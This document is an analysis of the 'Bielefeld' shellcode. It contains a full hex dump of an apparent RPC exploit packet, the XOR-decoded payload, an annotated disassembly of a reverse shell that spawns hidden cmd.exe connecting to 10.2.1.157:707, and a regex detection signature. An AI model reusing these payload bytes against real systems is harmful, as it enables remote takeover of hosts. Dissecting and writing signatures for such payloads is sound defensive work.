Bielefeld Shellcode
Shellcode
raw
/*
00000000 05 00 00 03 10 00 00 00 a8 06 00 00 e5 00 00 00 |................|
00000010 90 06 00 00 01 00 04 00 05 00 06 00 01 00 00 00 |................|
00000020 00 00 00 00 32 24 58 fd cc 45 64 49 b0 70 dd ae |....2$X..EdI.p..|
00000030 74 2c 96 d2 60 5e 0d 00 01 00 00 00 00 00 00 00 |t,..`^..........|
00000040 70 5e 0d 00 02 00 00 00 7c 5e 0d 00 00 00 00 00 |p^......|^......|
00000050 10 00 00 00 80 96 f1 f1 2a 4d ce 11 a6 6a 00 20 |........*M...j. |
00000060 af 6e 72 f4 0c 00 00 00 4d 41 52 42 01 00 00 00 |.nr.....MARB....|
00000070 00 00 00 00 0d f0 ad ba 00 00 00 00 a8 f4 0b 00 |................|
00000080 20 06 00 00 20 06 00 00 4d 45 4f 57 04 00 00 00 | ... ...MEOW....|
00000090 a2 01 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 |...............F|
000000a0 38 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 |8..............F|
000000b0 00 00 00 00 f0 05 00 00 e8 05 00 00 00 00 00 00 |................|
000000c0 01 10 08 00 cc cc cc cc c8 00 00 00 4d 45 4f 57 |............MEOW|
000000d0 e8 05 00 00 d8 00 00 00 00 00 00 00 02 00 00 00 |................|
000000e0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000f0 00 00 00 00 c4 28 cd 00 64 29 cd 00 00 00 00 00 |.....(..d)......|
00000100 07 00 00 00 b9 01 00 00 00 00 00 00 c0 00 00 00 |................|
00000110 00 00 00 46 ab 01 00 00 00 00 00 00 c0 00 00 00 |...F............|
00000120 00 00 00 46 a5 01 00 00 00 00 00 00 c0 00 00 00 |...F............|
00000130 00 00 00 46 a6 01 00 00 00 00 00 00 c0 00 00 00 |...F............|
00000140 00 00 00 46 a4 01 00 00 00 00 00 00 c0 00 00 00 |...F............|
00000150 00 00 00 46 ad 01 00 00 00 00 00 00 c0 00 00 00 |...F............|
00000160 00 00 00 46 aa 01 00 00 00 00 00 00 c0 00 00 00 |...F............|
00000170 00 00 00 46 07 00 00 00 60 00 00 00 58 00 00 00 |...F....`...X...|
00000180 90 00 00 00 40 00 00 00 20 00 00 00 38 03 00 00 |....@... ...8...|
00000190 30 00 00 00 01 00 00 00 01 10 08 00 cc cc cc cc |0...............|
000001a0 50 00 00 00 4f b6 88 20 ff ff ff ff 00 00 00 00 |P...O.. ........|
000001b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
000001f0 00 00 00 00 00 00 00 00 01 10 08 00 cc cc cc cc |................|
00000200 48 00 00 00 07 00 66 00 06 09 02 00 00 00 00 00 |H.....f.........|
00000210 c0 00 00 00 00 00 00 46 10 00 00 00 00 00 00 00 |.......F........|
00000220 00 00 00 00 01 00 00 00 00 00 00 00 78 19 0c 00 |............x...|
00000230 58 00 00 00 05 00 06 00 01 00 00 00 70 d8 98 93 |X...........p...|
00000240 98 4f d2 11 a9 3d be 57 b2 00 00 00 32 00 31 00 |.O...=.W....2.1.|
00000250 01 10 08 00 cc cc cc cc 80 00 00 00 0d f0 ad ba |................|
00000260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000270 18 43 14 00 00 00 00 00 60 00 00 00 60 00 00 00 |.C......`...`...|
00000280 4d 45 4f 57 04 00 00 00 c0 01 00 00 00 00 00 00 |MEOW............|
00000290 c0 00 00 00 00 00 00 46 3b 03 00 00 00 00 00 00 |.......F;.......|
000002a0 c0 00 00 00 00 00 00 46 00 00 00 00 30 00 00 00 |.......F....0...|
000002b0 01 00 01 00 81 c5 17 03 80 0e e9 4a 99 99 f1 8a |...........J....|
000002c0 50 6f 7a 85 02 00 00 00 00 00 00 00 00 00 00 00 |Poz.............|
000002d0 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 |................|
000002e0 01 10 08 00 cc cc cc cc 30 00 00 00 78 00 6e 00 |........0...x.n.|
000002f0 00 00 00 00 d8 da 0d 00 00 00 00 00 00 00 00 00 |................|
00000300 20 2f 0c 00 00 00 00 00 00 00 00 00 03 00 00 00 | /..............|
00000310 00 00 00 00 03 00 00 00 46 00 58 00 00 00 00 00 |........F.X.....|
00000320 01 10 08 00 cc cc cc cc 10 00 00 00 30 00 2e 00 |............0...|
00000330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000340 01 10 08 00 cc cc cc cc 68 00 00 00 0e 00 ff ff |........h.......|
00000350 68 8b 0b 00 02 00 00 00 00 00 00 00 00 00 00 00 |h...............|
00000360 86 01 00 00 00 00 00 00 86 01 00 00 5c 00 5c 00 |............\.\.|
00000370 46 00 58 00 4e 00 42 00 46 00 58 00 46 00 58 00 |F.X.N.B.F.X.F.X.|
00000380 4e 00 42 00 46 00 58 00 46 00 58 00 46 00 58 00 |N.B.F.X.F.X.F.X.|
00000390 46 00 58 00 9d 13 00 01 cc e0 fd 7f cc e0 fd 7f |F.X.............|
000003a0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
*
000004c0 90 90 90 90 90 90 eb 10 5a 4a 33 c9 66 b9 76 01 |........ZJ3.f.v.|
000004d0 80 34 0a 99 e2 fa eb 05 e8 eb ff ff ff 70 61 99 |.4...........pa.|
000004e0 99 99 c3 21 95 69 64 e6 12 99 12 e9 85 34 12 d9 |...!.id......4..|
000004f0 91 12 41 12 ea a5 9a 6a 12 ef e1 9a 6a 12 e7 b9 |..A....j....j...|
00000500 9a 62 12 d7 8d aa 74 cf ce c8 12 a6 9a 62 12 6b |.b....t......b.k|
00000510 f3 97 c0 6a 3f ed 91 c0 c6 1a 5e 9d dc 7b 70 c0 |...j?.....^..{p.|
00000520 c6 c7 12 54 12 df bd 9a 5a 48 78 9a 58 aa 50 ff |...T....ZHx.X.P.|
00000530 12 91 12 df 85 9a 5a 58 78 9b 9a 58 12 99 9a 5a |......ZXx..X...Z|
00000540 12 63 12 6e 1a 5f 97 12 49 f3 9a c0 71 ed 99 99 |.c.n._..I...q...|
00000550 99 1a 5f 94 cb cf 66 ce 65 c3 12 41 f3 9a c0 71 |.._...f.e..A...q|
00000560 f8 99 99 99 1a 75 dd 12 6d f3 89 c0 10 9d 17 7b |.....u..m......{|
00000570 62 c9 c9 c9 c9 f3 98 f3 9b 66 ce 6d 12 41 10 c7 |b........f.m.A..|
00000580 a1 10 c7 a5 10 c7 d9 ff 5e df b5 98 98 14 de 89 |........^.......|
00000590 c9 cf aa 59 c9 c9 c9 f3 98 c9 c9 14 ce a5 5e 9b |...Y..........^.|
000005a0 fa f4 fd 99 cb c9 66 ce 71 5e 9e 9b 99 9b 5a 5e |......f.q^....Z^|
000005b0 de 9d 93 9b 98 04 f3 89 ce ca 66 ce 61 ca 66 ce |..........f.a.f.|
000005c0 65 c9 66 ce 75 aa 59 35 1c 59 ec 60 c8 cb cf ca |e.f.u.Y5.Y.`....|
000005d0 66 4b c3 c0 32 7b 77 aa 59 5a 71 9a 66 66 66 de |fK..2{w.YZq.fff.|
000005e0 fc ed c9 eb f6 fa d8 fd fd eb fc ea ea 99 da eb |................|
000005f0 fc f8 ed fc c9 eb f6 fa fc ea ea d8 99 dc e1 f0 |................|
00000600 ed cd f1 eb fc f8 fd 99 d5 f6 f8 fd d5 f0 fb eb |................|
00000610 f8 eb e0 d8 99 ee ea ab c6 aa ab 99 ce ca d8 ca |................|
00000620 f6 fa f2 fc ed d8 99 fa f6 f7 f7 fc fa ed 99 fa |................|
00000630 f5 f6 ea fc ea f6 fa f2 fc ed 99 00 5c 00 43 00 |............\.C.|
00000640 24 00 5c 00 31 00 32 00 33 00 34 00 35 00 36 00 |$.\.1.2.3.4.5.6.|
00000650 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 |1.1.1.1.1.1.1.1.|
00000660 31 00 31 00 31 00 31 00 31 00 31 00 31 00 2e 00 |1.1.1.1.1.1.1...|
00000670 64 00 6f 00 63 00 00 00 01 10 08 00 cc cc cc cc |d.o.c...........|
00000680 20 00 00 00 30 00 2d 00 00 00 00 00 88 2a 0c 00 | ...0.-......*..|
00000690 02 00 00 00 01 00 00 00 28 8c 0c 00 01 00 00 00 |........(.......|
000006a0 07 00 00 00 00 00 00 00 |........|
000006a8
*/
unxor'd
00000000: 05 00 00 03 10 00 00 00 - a8 06 00 00 e5 00 00 00 ........ ........
00000010: 90 06 00 00 01 00 04 00 - 05 00 06 00 01 00 00 00 ........ ........
00000020: 00 00 00 00 32 24 58 fd - cc 45 64 49 b0 70 dd ae ....2.X. .EdI.p..
00000030: 74 2c 96 d2 60 5e 0d 00 - 01 00 00 00 00 00 00 00 t....... ........
00000040: 70 5e 0d 00 02 00 00 00 - 7c 5e 0d 00 00 00 00 00 p....... ........
00000050: 10 00 00 00 80 96 f1 f1 - 2a 4d ce 11 a6 6a 00 20 ........ .M...j..
00000060: af 6e 72 f4 0c 00 00 00 - 4d 41 52 42 01 00 00 00 .nr..... MARB....
00000070: 00 00 00 00 0d f0 ad ba - 00 00 00 00 a8 f4 0b 00 ........ ........
00000080: 20 06 00 00 20 06 00 00 - 4d 45 4f 57 04 00 00 00 ........ MEOW....
00000090: a2 01 00 00 00 00 00 00 - c0 00 00 00 00 00 00 46 ........ .......F
000000a0: 38 03 00 00 00 00 00 00 - c0 00 00 00 00 00 00 46 8....... .......F
000000b0: 00 00 00 00 f0 05 00 00 - e8 05 00 00 00 00 00 00 ........ ........
000000c0: 01 10 08 00 cc cc cc cc - c8 00 00 00 4d 45 4f 57 ........ ....MEOW
000000d0: e8 05 00 00 d8 00 00 00 - 00 00 00 00 02 00 00 00 ........ ........
000000e0: 07 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........
000000f0: 00 00 00 00 c4 28 cd 00 - 64 29 cd 00 00 00 00 00 ........ d.......
00000100: 07 00 00 00 b9 01 00 00 - 00 00 00 00 c0 00 00 00 ........ ........
00000110: 00 00 00 46 ab 01 00 00 - 00 00 00 00 c0 00 00 00 ...F.... ........
00000120: 00 00 00 46 a5 01 00 00 - 00 00 00 00 c0 00 00 00 ...F.... ........
00000130: 00 00 00 46 a6 01 00 00 - 00 00 00 00 c0 00 00 00 ...F.... ........
00000140: 00 00 00 46 a4 01 00 00 - 00 00 00 00 c0 00 00 00 ...F.... ........
00000150: 00 00 00 46 ad 01 00 00 - 00 00 00 00 c0 00 00 00 ...F.... ........
00000160: 00 00 00 46 aa 01 00 00 - 00 00 00 00 c0 00 00 00 ...F.... ........
00000170: 00 00 00 46 07 00 00 00 - 60 00 00 00 58 00 00 00 ...F.... ....X...
00000180: 90 00 00 00 40 00 00 00 - 20 00 00 00 38 03 00 00 ........ ....8...
00000190: 30 00 00 00 01 00 00 00 - 01 10 08 00 cc cc cc cc 0....... ........
000001a0: 50 00 00 00 4f b6 88 20 - ff ff ff ff 00 00 00 00 P...O... ........
000001b0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........
000001c0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........
000001d0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........
000001e0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........
000001f0: 00 00 00 00 00 00 00 00 - 01 10 08 00 cc cc cc cc ........ ........
00000200: 48 00 00 00 07 00 66 00 - 06 09 02 00 00 00 00 00 H.....f. ........
00000210: c0 00 00 00 00 00 00 46 - 10 00 00 00 00 00 00 00 .......F ........
00000220: 00 00 00 00 01 00 00 00 - 00 00 00 00 78 19 0c 00 ........ ....x...
00000230: 58 00 00 00 05 00 06 00 - 01 00 00 00 70 d8 98 93 X....... ....p...
00000240: 98 4f d2 11 a9 3d be 57 - b2 00 00 00 32 00 31 00 .O.....W ....2.1.
00000250: 01 10 08 00 cc cc cc cc - 80 00 00 00 0d f0 ad ba ........ ........
00000260: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........
00000270: 18 43 14 00 00 00 00 00 - 60 00 00 00 60 00 00 00 .C...... ........
00000280: 4d 45 4f 57 04 00 00 00 - c0 01 00 00 00 00 00 00 MEOW.... ........
00000290: c0 00 00 00 00 00 00 46 - 3b 03 00 00 00 00 00 00 .......F ........
000002a0: c0 00 00 00 00 00 00 46 - 00 00 00 00 30 00 00 00 .......F ....0...
000002b0: 01 00 01 00 81 c5 17 03 - 80 0e e9 4a 99 99 f1 8a ........ ...J....
000002c0: 50 6f 7a 85 02 00 00 00 - 00 00 00 00 00 00 00 00 Poz..... ........
000002d0: 00 00 00 00 00 00 00 00 - 00 00 00 00 01 00 00 00 ........ ........
000002e0: 01 10 08 00 cc cc cc cc - 30 00 00 00 78 00 6e 00 ........ 0...x.n.
000002f0: 00 00 00 00 d8 da 0d 00 - 00 00 00 00 00 00 00 00 ........ ........
00000300: 20 2f 0c 00 00 00 00 00 - 00 00 00 00 03 00 00 00 ........ ........
00000310: 00 00 00 00 03 00 00 00 - 46 00 58 00 00 00 00 00 ........ F.X.....
00000320: 01 10 08 00 cc cc cc cc - 10 00 00 00 30 00 2e 00 ........ ....0...
00000330: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........
00000340: 01 10 08 00 cc cc cc cc - 68 00 00 00 0e 00 ff ff ........ h.......
00000350: 68 8b 0b 00 02 00 00 00 - 00 00 00 00 00 00 00 00 h....... ........
00000360: 86 01 00 00 00 00 00 00 - 86 01 00 00 5c 00 5c 00 ........ ........
00000370: 46 00 58 00 4e 00 42 00 - 46 00 58 00 46 00 58 00 F.X.N.B. F.X.F.X.
00000380: 4e 00 42 00 46 00 58 00 - 46 00 58 00 46 00 58 00 N.B.F.X. F.X.F.X.
00000390: 46 00 58 00 9d 13 00 01 - cc e0 fd 7f cc e0 fd 7f F.X..... ........
000003a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000003b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000003c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000003d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000003e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000003f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000400: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000410: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000420: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000430: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000440: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000450: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000460: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000470: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000480: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000490: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000004a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000004b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000004c0: 90 90 90 90 90 90 eb 10 - 5a 4a 33 c9 66 b9 76 01 ........ ZJ3.f.v.
000004d0: 80 34 0a 99 e2 fa eb 05 - e8 eb ff ff ff e9 f8 00 .4...... ........
000004e0: 00 00 5a b8 0c f0 fd 7f - 8b 00 8b 70 1c ad 8b 40 ..Z..... ...p....
000004f0: 08 8b d8 8b 73 3c 03 f3 - 8b 76 78 03 f3 8b 7e 20 ....s... .vx.....
00000500: 03 fb 8b 4e 14 33 ed 56 - 57 51 8b 3f 03 fb 8b f2 ...N.3.V WQ......
00000510: 6a 0e 59 f3 a6 74 08 59 - 5f 83 c7 04 45 e2 e9 59 j.Y..t.Y ....E..Y
00000520: 5f 5e 8b cd 8b 46 24 03 - c3 d1 e1 03 c1 33 c9 66 .....F.. .....3.f
00000530: 8b 08 8b 46 1c 03 c3 c1 - e1 02 03 c1 8b 00 03 c3 ...F.... ........
00000540: 8b fa 8b f7 83 c6 0e 8b - d0 6a 03 59 e8 74 00 00 ........ .j.Y.t..
00000550: 00 83 c6 0d 52 56 ff 57 - fc 5a 8b d8 6a 03 59 e8 ....RV.W .Z..j.Y.
00000560: 61 00 00 00 83 ec 44 8b - f4 6a 10 59 89 04 8e e2 a.....D. .j.Y....
00000570: fb 50 50 50 50 6a 01 6a - 02 ff 57 f4 8b d8 89 5e .PPPPj.j ..W.....
00000580: 38 89 5e 3c 89 5e 40 66 - c7 46 2c 01 01 8d 47 10 8......f .F....G.
00000590: 50 56 33 c0 50 50 50 6a - 01 50 50 8d 57 3c c7 02 PV3.PPPj .PP.W...
000005a0: 63 6d 64 00 52 50 ff 57 - e8 c7 07 02 00 02 c3 c7 cmd.RP.W ........
000005b0: 47 04 0a 02 01 9d 6a 10 - 57 53 ff 57 f8 53 ff 57 G.....j. WS.W.S.W
000005c0: fc 50 ff 57 ec 33 c0 ac - 85 c0 75 f9 51 52 56 53 .P.W.3.. ..u.QRVS
000005d0: ff d2 5a 59 ab e2 ee 33 - c0 c3 e8 03 ff ff ff 47 ..ZY...3 .......G
000005e0: 65 74 50 72 6f 63 41 64 - 64 72 65 73 73 00 43 72 etProcAd dress.Cr
000005f0: 65 61 74 65 50 72 6f 63 - 65 73 73 41 00 45 78 69 eateProc essA.Exi
00000600: 74 54 68 72 65 61 64 00 - 4c 6f 61 64 4c 69 62 72 tThread. LoadLibr
00000610: 61 72 79 41 00 77 73 32 - 5f 33 32 00 57 53 41 53 aryA.ws2 .32.WSAS
00000620: 6f 63 6b 65 74 41 00 63 - 6f 6e 6e 65 63 74 00 63 ocketA.c onnect.c
00000630: 6c 6f 73 65 73 6f 63 6b - 65 74 00 00 5c 00 43 00 losesock et....C.
00000640: 24 00 5c 00 31 00 32 00 - 33 00 34 00 35 00 36 00 ....1.2. 3.4.5.6.
00000650: 31 00 31 00 31 00 31 00 - 31 00 31 00 31 00 31 00 1.1.1.1. 1.1.1.1.
00000660: 31 00 31 00 31 00 31 00 - 31 00 31 00 31 00 2e 00 1.1.1.1. 1.1.1...
00000670: 64 00 6f 00 63 00 00 00 - 01 10 08 00 cc cc cc cc d.o.c... ........
00000680: 20 00 00 00 30 00 2d 00 - 00 00 00 00 88 2a 0c 00 ....0... ........
00000690: 02 00 00 00 01 00 00 00 - 28 8c 0c 00 01 00 00 00 ........ ........
000006a0: 07 00 00 00 00 00 00 00 - 00 ........ .
Analysis
xor decoder
00402006 eb 10 jmp short bielefel.00402018 ; }
00402008 5a pop edx ; }
00402009 4a dec edx ; }
0040200a 33c9 xor ecx,ecx ; }
0040200c 66:b9 7601 mov cx,176 ; } decoder: cx = 0x176 (374 bytes) XOR'd with key 0x99, starting at edx+1 = 0040201d
00402010 80340a 99 xor byte ptr ds:[edx+ecx],99 ; }
00402014 ^e2 fa loopd short bielefel.00402010 ; }
00402016 eb 05 jmp short bielefel.0040201d ; }
00402018 e8 ebffffff call bielefel.00402008 ; }
; ==========================================================================
unxor'd shellcode
0040201d e9 f8000000 jmp bielefel.0040211a
00402022 5a pop edx ; start, find getprocaddress
00402023 b8 0cf0fd7f mov eax,7ffdf00c ; hard-coded PEB (0x7ffdf000) + 0xc = Ldr; only works on pre-ASLR windows where the PEB always maps at that address
00402028 8b00 mov eax,dword ptr ds:[eax]
0040202a 8b70 1c mov esi,dword ptr ds:[eax+1c] ; Ldr+0x1c: InInitializationOrderModuleList.Flink
0040202d ad lods dword ptr ds:[esi] ; step to the 2nd list entry
0040202e 8b40 08 mov eax,dword ptr ds:[eax+8] ; its DllBase -> ebx; kernel32.dll on 2000/XP/2003, which the export walk below assumes
00402031 8bd8 mov ebx,eax
00402033 8b73 3c mov esi,dword ptr ds:[ebx+3c]
00402036 03f3 add esi,ebx
00402038 8b76 78 mov esi,dword ptr ds:[esi+78]
0040203b 03f3 add esi,ebx
0040203d 8b7e 20 mov edi,dword ptr ds:[esi+20]
00402040 03fb add edi,ebx
00402042 8b4e 14 mov ecx,dword ptr ds:[esi+14] ; export NumberOfFunctions (+0x14) is used as the name-loop bound, not NumberOfNames (+0x18)
00402045 33ed xor ebp,ebp
00402047 56 push esi
00402048 57 push edi
00402049 51 push ecx
0040204a 8b3f mov edi,dword ptr ds:[edi]
0040204c 03fb add edi,ebx
0040204e 8bf2 mov esi,edx
00402050 6a 0e push 0e
00402052 59 pop ecx
00402053 f3:a6 repe cmps byte ptr es:[edi],byte ptr ds:[esi] ; compare the first 0x0e bytes against "GetProcAddress" (prefix match only, no terminator check)
00402055 74 08 je short bielefel.0040205f
00402057 59 pop ecx
00402058 5f pop edi
00402059 83c7 04 add edi,4
0040205c 45 inc ebp
0040205d ^e2 e9 loopd short bielefel.00402048
0040205f 59 pop ecx ; getprocaddress entry found
00402060 5f pop edi
00402061 5e pop esi
00402062 8bcd mov ecx,ebp
00402064 8b46 24 mov eax,dword ptr ds:[esi+24]
00402067 03c3 add eax,ebx
00402069 d1e1 shl ecx,1
0040206b 03c1 add eax,ecx
0040206d 33c9 xor ecx,ecx
0040206f 66:8b08 mov cx,word ptr ds:[eax]
00402072 8b46 1c mov eax,dword ptr ds:[esi+1c]
00402075 03c3 add eax,ebx
00402077 c1e1 02 shl ecx,2
0040207a 03c1 add eax,ecx
0040207c 8b00 mov eax,dword ptr ds:[eax]
0040207e 03c3 add eax,ebx
00402080 8bfa mov edi,edx
00402082 8bf7 mov esi,edi
00402084 83c6 0e add esi,0e
00402087 8bd0 mov edx,eax ; eax == getprocaddress
00402089 6a 03 push 3
0040208b 59 pop ecx
0040208c e8 74000000 call bielefel.00402105 ; resolve {createprocessa, exitthread, loadlibrarya}, stored at edi+0..edi+8 (later read as [edi-18], [edi-14], [edi-10])
00402091 83c6 0d add esi,0d
00402094 52 push edx
00402095 56 push esi
00402096 ff57 fc call dword ptr ds:[edi-4] ; loadlibrarya("ws2_32") -- the string carries no ".dll"; the loader appends it
00402099 5a pop edx
0040209a 8bd8 mov ebx,eax
0040209c 6a 03 push 3
0040209e 59 pop ecx
0040209f e8 61000000 call bielefel.00402105 ; find addr for {wsasocketa, connect, closesocket}
004020a4 83ec 44 sub esp,44 ; 0x44 = sizeof(STARTUPINFOA), lpstartupinfo buffer on the stack
004020a7 8bf4 mov esi,esp
004020a9 6a 10 push 10
004020ab 59 pop ecx
004020ac 89048e mov dword ptr ds:[esi+ecx*4],eax ; zero dwords esi+4..esi+0x40 (eax == 0 here); esi+0 (cb) is left uninitialised
004020af ^e2 fb loopd short bielefel.004020ac
004020b1 50 push eax
004020b2 50 push eax
004020b3 50 push eax
004020b4 50 push eax
004020b5 6a 01 push 1
004020b7 6a 02 push 2
004020b9 ff57 f4 call dword ptr ds:[edi-c] ; wsasocketa(af=2, type=1, protocol=0, 0, 0, dwflags=0): no WSA_FLAG_OVERLAPPED, so the socket can back the child's std handles
004020bc 8bd8 mov ebx,eax
004020be 895e 38 mov dword ptr ds:[esi+38],ebx ; }
004020c1 895e 3c mov dword ptr ds:[esi+3c],ebx ; } lpstartupinfo: stdin/stdout/stderr -> use socket
004020c4 895e 40 mov dword ptr ds:[esi+40],ebx ; }
004020c7 66:c746 2c 0101 mov word ptr ds:[esi+2c],101 ; lpstartupinfo: dwflags = 0x101 = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW (wshowwindow at +0x30 was zeroed above -> SW_HIDE)
004020cd 8d47 10 lea eax,dword ptr ds:[edi+10]
004020d0 50 push eax ; lpprocessinformation -> edi+0x10, inside the already-consumed import-name table that follows the code
004020d1 56 push esi ; lpstartupinfo -> stack
004020d2 33c0 xor eax,eax
004020d4 50 push eax ; lpcurrentdirectory == 0
004020d5 50 push eax ; lpenvironment == 0
004020d6 50 push eax ; dwcreationflags == 0
004020d7 6a 01 push 1 ; binherithandles == 1
004020d9 50 push eax ; lpthreadattributes == 0
004020da 50 push eax ; lpprocessattributes == 0
004020db 8d57 3c lea edx,dword ptr ds:[edi+3c]
004020de c702 636d6400 mov dword ptr ds:[edx],646d63
004020e4 52 push edx ; lpcommandline == "cmd"
004020e5 50 push eax ; lpapplicationname == 0
004020e6 ff57 e8 call dword ptr ds:[edi-18] ; createprocessa()
004020e9 c707 020002c3 mov dword ptr ds:[edi],c3020002 ; sockaddr_in: sin_family = 2 (AF_INET), sin_port = bytes 02 c3 -> 707 (network byte order)
004020ef c747 04 0a02019d mov dword ptr ds:[edi+4],9d01020a ; sin_addr = bytes 0a 02 01 9d -> 10.2.1.157, the connect-back target
004020f6 6a 10 push 10
004020f8 57 push edi ; in_addr
004020f9 53 push ebx
004020fa ff57 f8 call dword ptr ds:[edi-8] ; connect()
004020fd 53 push ebx
004020fe ff57 fc call dword ptr ds:[edi-4] ; closesocket()
00402101 50 push eax
00402102 ff57 ec call dword ptr ds:[edi-14] ; exitthread()
; ==========================================================================
; resolve ecx exports from module ebx via GetProcAddress (edx): skip esi to the next NUL-terminated name, call, stosd the address at edi; returns eax == 0
00402105 33c0 xor eax,eax
00402107 ac lods byte ptr ds:[esi]
00402108 85c0 test eax,eax
0040210a ^75 f9 jnz short bielefel.00402105
0040210c 51 push ecx
0040210d 52 push edx
0040210e 56 push esi
0040210f 53 push ebx
00402110 ffd2 call edx
00402112 5a pop edx
00402113 59 pop ecx
00402114 ab stos dword ptr es:[edi]
00402115 ^e2 ee loopd short bielefel.00402105
00402117 33c0 xor eax,eax
00402119 c3 retn
; ==========================================================================
0040211a e8 03ffffff call bielefel.00402022
Pattern
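/*
 * Detection signature for the connect-back tail above (004020de..00402104):
 * the "cmd\0" store, the CreateProcessA call, the two stores that fill the
 * sockaddr_in, then the connect()/closesocket()/ExitThread() sequence.
 * Group 1 captures sin_port (2 bytes, network byte order); group 2 captures
 * sin_addr (4 bytes).
 *
 * The captured bytes are arbitrary binary.  A bare `.` does not match 0x0a
 * unless the engine is run in dotall/single-line mode, and this very sample's
 * callback address 10.2.1.157 begins with 0x0a -- so the captures use an
 * explicit byte class and match regardless of engine flags.  Backslashes are
 * doubled because this is a C literal holding a regex.
 */
const char *pattern =
"\\xc7\\x02\\x63\\x6d\\x64\\x00\\x52\\x50\\xff\\x57\\xe8"
"\\xc7\\x07\\x02\\x00([\\x00-\\xff]{2})\\xc7\\x47\\x04([\\x00-\\xff]{4})\\x6a\\x10"
"\\x57\\x53\\xff\\x57\\xf8\\x53\\xff\\x57\\xfc\\x50\\xff"
"\\x57\\xec";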